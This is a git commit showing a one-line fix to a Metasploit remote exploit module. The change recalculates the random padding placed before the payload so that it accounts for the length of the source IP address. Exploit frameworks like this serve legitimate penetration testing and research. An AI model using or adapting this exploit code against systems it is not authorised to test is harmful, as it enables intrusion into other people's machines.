trying to fix the variable offset length

bug/bundler_fix
jvazquez-r7 2013-01-04 00:25:34 +01:00
parent 9cea2d9af9
commit a0b4045b4b
1 changed files with 1 additions and 1 deletions

View File

@ -147,7 +147,7 @@ class Metasploit3 < Msf::Exploit::Remote
prio << ">" prio << ">"
message = prio message = prio
message << rand_text_alpha(11) message << rand_text_alpha(9 + (15 - Rex::Socket.source_address(datastore['RHOST']).length)) # Allow to handle the variable offset due to the source ip length
message << get_payload message << get_payload
print_status("#{rhost}:#{rport} - Trying to exploit #{target.name}...") print_status("#{rhost}:#{rport} - Trying to exploit #{target.name}...")